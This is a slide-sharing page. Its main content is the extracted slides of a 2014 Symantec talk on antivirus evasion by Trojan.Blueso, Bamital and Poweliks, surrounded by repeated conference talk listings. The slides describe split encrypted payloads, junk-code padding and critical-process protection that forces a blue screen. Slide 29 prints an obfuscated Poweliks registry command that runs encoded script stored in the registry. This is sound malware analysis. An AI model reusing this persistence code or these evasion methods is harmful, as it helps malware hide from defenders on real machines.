[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之CODE BLUE
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo PupilloCODE BLUE
 
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman [cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman CODE BLUE
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫CODE BLUE
 
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...CODE BLUE
 
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka [cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka CODE BLUE
 
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...CODE BLUE
 
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...CODE BLUE
 
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...CODE BLUE
 
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...CODE BLUE
 
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也CODE BLUE
 
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...CODE BLUE
 
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...CODE BLUE
 

More from CODE BLUE (20)

[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
 
[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl
 
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
 
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman [cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
 
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
 
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka [cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
 
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
 
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
 
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
 
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
 
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
 
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
 
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
 

Recently uploaded

A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rick Flair
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 

Recently uploaded (20)

A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 

CODE BLUE 2014 : how to avoid the Detection by Malware by HIROSHI SNINOTSUKA

  • 1. How  malware  avoid  An/  Virus  scanning   Hiroshi  Shinotsuka   Threat  Analysis  Engineer
  • 2. Self-­‐introduc/on   Copyright  ©  2014  Symantec  Corpora;on   2   •  Threat  analysis  engineer  in  Symantec.   •  Analyze  suspicious  file  and  create  An;-­‐Virus  signature   •  Provide  detailed  technical  descrip;on  to  customers  on   demand   •  Publically  provide  malware-­‐related  informa;on  
  • 3. Copyright  ©  2014  Symantec  Corpora;on   3   24  hours  x  365  days  
  • 4. ABacker’s  techniques  to  avoid  detec/ng   1   Store  decryp;on  key  and  data  in   separate  files   2   Large  amount  of    junk  code   3   Process  protec;on   4   Store  malicious  code  outside  of  files   (fileless  malware)   Copyright  ©  2014  Symantec  Corpora;on   4  
  • 5. Trojan.Blueso  detec/on Copyright  ©  2014  Symantec  Corpora;on   5   0   5,000   10,000   15,000   20,000   25,000   30,000   35,000   Trojan.Blueso   August   September   October   November  
  • 6. Trojan.Blueso  file  structure   Copyright  ©  2014  Symantec  Corpora;on   6   RAR  self-­‐extrac/ng    file  13  MB   AutoIt     executable  file   Decryp;on  code   script  file Decryp;on  key   configura;on  file Encrypted  code AutoIt  is  a  programing  language  for  MicrosoW  Windows  plaYorm.  The  AutoIt   syntax  is  very  similar  to  that  of  BASIC  programing  language  and  is  designed  to   automate  the  Windows  GUI. RAR  self-­‐extrac;ng  file  drops  4   files,  then  it  execute  AutoIt   script  
  • 7. Decrypted   code   Bluso  inject  Backdoor.Trojan   Copyright  ©  2014  Symantec  Corpora;on   7   Code   Decryp;on  key   Encrypted  code   Legi;mate    Windows  Process   Decryp;on   Part  of   Decrypted   code   Internet  Explorer   Process   Decry pted   code   AutoIt  executable  
  • 8. Watch  Dog  monitor   Copyright  ©  2014  Symantec  Corpora;on   8   File  deleted   Process  deleted   Create  Process   Inject   Create  File   Trojan.Blueso  make  file/registry/process  again   if  An;virus  delete  it.  
  • 9. ABacker’s  techniques  to  avoid  detec/ng   1   Store  decryp;on  key  and  data  in   separate  files   2   Large  amount  of    junk  code   3   Process  protec;on   4   Store  malicious  code  outside  of  files   (fileless  malware)   Copyright  ©  2014  Symantec  Corpora;on   9  
  • 10. Tradi/onal  sample   Copyright  ©  2014  Symantec  Corpora;on   10   Packer  /  Self  update   •  Harder  to  detect  encrypted  files.   •  Tradi;onal  sample  stored  all  informa;on  in  single  file. Code   Decryp;on  key   Encrypted   code Code   Decrypted   malicious  code  
  • 11. New  technique  to  avoid  detec/on   Copyright  ©  2014  Symantec  Corpora;on   11   Tradi;onally  malware  saved  decrypted  image  to  a  file  and  executed.  An;virus   scanner  detects  malware  when  malware  saved  it  decrypted  image  onto  the   disk.   New  technique  is  to  inject  decrypted  image  to  a  new  running  process  and   executes  in  order  to  avoid  detec;on  by  file  scan.   Decrypted   malicious  code   Legi;mate    Windows  Process  Decrypt  in  memory   Decrypted   malicious  code  Code   Decryp;on  key   Encrypted  code AutoIt  executable  
  • 12. File  detail   Copyright  ©  2014  Symantec  Corpora;on   12   Code   Decryp;on  key   Encrypted  code
  • 13. An;Virus  scanner  scans  each  file.   Why  aBacker  split  malware  into  four  separate  files   Copyright  ©  2014  Symantec  Corpora;on   13   AutoIt  executable   Decryp;on  code   Decryp;on  key   Seeng  file Encrypted  code Scan   Scan   Scan   Scan  
  • 14. What  does  this  mean?   •  Hiding  malicious  code  by  encryp;ng   •  Store  code,  decryp;on  key,  encrypted  code  in  separate  files.   •  An;virus  scanner  can’t  determine  ‘encrypted  code’  as  malicious   file.   •  An;virus  scanner  can’t  detect  the  file  without  understanding   rela;onships  between  mul;ple  files.   Copyright  ©  2014  Symantec  Corpora;on   14  
  • 15. ABacker’s  techniques  to  avoid  detec/ng   1   Store  decryp;on  key  and  data  in   separate  files   2   Large  amount  of    junk  code   3   Process  protec;on   4   Store  malicious  code  outside  of  files   (fileless  malware)   Copyright  ©  2014  Symantec  Corpora;on   15  
  • 16. Code(Beginning  of  file)   Copyright  ©  2014  Symantec  Corpora;on   16   I  TAB  character  is  replaced  with  1  byte  string   You  only  see  junk  comment  lines  !  
  • 17. Code  (Sample  1)   Copyright  ©  2014  Symantec  Corpora;on   17  
  • 18. Code  (Sample  2)   Copyright  ©  2014  Symantec  Corpora;on   18  
  • 19. Code   Copyright  ©  2014  Symantec  Corpora;on   19   Finally,  at  line  23670,  16MB  in  size,  important  code  is  reached.   87476  lines  of  AutoIt  script  codes.   Only  900  lines  without  comment  lines.   Only  1%  important  codes.
  • 20. An/virus  scan  method   Copyright  ©  2014  Symantec  Corpora;on   20   •  An;virus  scanner  needs  to  have  balance  between  detec;on  and   performance   •  An;virus  scanner  first  determines  file  types  and  starts  file  scan   based  on  the  detected  file  type.   Executable  file ZIP  file JPEG  file
  • 21. No  special  file  structure  in  text  file/script  file. Copyright  ©  2014  Symantec  Corpora;on   21   Script  files  have  no  file-­‐header,  which  means  the  files  have  no  special   file  structure.   An;virus  scanner  needs  to  run  a  par;al  scan  and  determine  what  the   file  is.   Very  difficult  to  keep  scan  performance  if  malicious  script  has  so  many   comment/junk  code.
  • 22. ABacker’s  techniques  to  avoid  detec/ng   1   Store  decryp;on  key  and  data  in   separate  files   2   Large  amount  of    junk  code   3   Process  protec;on   4   Store  malicious  code  outside  of  files   (fileless  malware)   Copyright  ©  2014  Symantec  Corpora;on   22  
  • 23. How  does  Blueso  start  and  protect  itself?   Copyright  ©  2014  Symantec  Corpora;on   23   Code   Decryp;on  key   Encrypted  code Legi;mate    Windows  Process   Decryp;on   Internet  Explorer   process   Malware  !! Malware  ?? What  is  wrong  ?? AutoIt   executable  
  • 24. Process  protec/on  mechanism   Copyright  ©  2014  Symantec  Corpora;on   24   1)  Terminate  Internet  Explorer   -­‐>  Malicious  code  injected  into  Legi;mate  Windows  Process  is  executed  again   2)  Terminate  Legi;mate  Windows  Process   -­‐>  Running  script  on  AutoIt  execute  again   3)  Terminate  AutoIt  ?   -­‐>  Handle  AutoIt  executable  as  an  essen;al  process  for  Windows    system  by  using   undocumented  API  NtSetInforma;onProcess   As  soon  as  AutoIT  is  terminated,  Windows  determines  it  as  unrecoverable  cri;cal   problem.   -­‐>  Blue  Screen  Of  Death  !!  
  • 25. Blue  Screen  Of  Death   Copyright  ©  2014  Symantec  Corpora;on   25  
  • 26. ABacker’s  techniques  to  avoid  detec/ng   1   Store  decryp;on  key  and  data  in   separate  files   2   Large  amount  of    junk  code   3   Process  protec;on   4   Store  malicious  code  outside  of  files   (fileless  malware)   Copyright  ©  2014  Symantec  Corpora;on   26  
  • 27. Example  of  malware  store  code/data  in  irregular   place(Bamital)   Copyright  ©  2014  Symantec  Corpora;on   27   Set  registry  entry  to  start  a  code  when  windows  restarts.   HKEY_LOCAL_MACHINEsystemCurrentControlSetControlSession  Manager AppCertDlls"AppSecDll"  =   "%USER_Profile%Local  SeengsApplica;on  DataWindows  Serverxblscp.dll“   Because  of  analysis  already  performed,  xblscp.dll  is  determined  as  a  malicious  file.   Stricktly  speaking,  does  this  file  have  malicious  code  in  it?  
  • 28. Example  of  malware  store  code/data  in  irregular  place   (Bamital)2   Copyright  ©  2014  Symantec  Corpora;on   28   How  it  works   •  Allocate  memory   •  Store  data  from  registry  to  the  allocated  memory •  Call  the  allocated  memory An;virus  scanner  doe  not  know  data  rule.  The  data  is  wriven  in   registry.   Another  malware  uses  same  technique  by  file.
  • 29. Example  of  malware  store  code/data  in  irregular   place(Poweliks)   Copyright  ©  2014  Symantec  Corpora;on   29   Trojan.Poweliks  writes  a  Windows  Powershell  script  to  registry. You  can  find  this  registry  entry  may  execute  encrypted  java  script.   Encrypted  code  that  should  be  decrypted  in  different  registry  entry. HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{73E709EA-­‐5D93-­‐4B2E-­‐ BBB0-­‐99B7938DA9E4}LocalServer32(Default)  =   rundll32.exe  javascript:"..mshtml,RunHTMLApplica;on  ";eval("epdvnfou/xsjuf) (=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/ S~Se)(ILDS]]dmtje]]|84f81:.6e:4.5c3f.ccc1.::c8:49eb:f5~]]mpdbmYswfs43]]b(*, (=0tdsjqu?(*".replace(/./g,func;on(_){return %20String.fromCharCode(_.charCodeAt()-­‐1);}))   "a"="#@~^k4QAAA==n{F+2i@#@&l{x APzmOk7+p6(L+1O`r ?1.rwDRUtnVsE*i@#@  
  • 30. Conclusion   Copyright  ©  2014  Symantec  Corpora;on   30   •  Avackers  discover  new  techniques  every  day.   •  Avackers  employ  techniques  to  make  malware  removal  difficult   •  File  based  scanning  is  no  longer  effec;ve   •  Mul;-­‐layered  security  is  becoming  more  important  
  • 31. &  Q   A   Copyright  ©  2014  Symantec  Corpora;on   31  
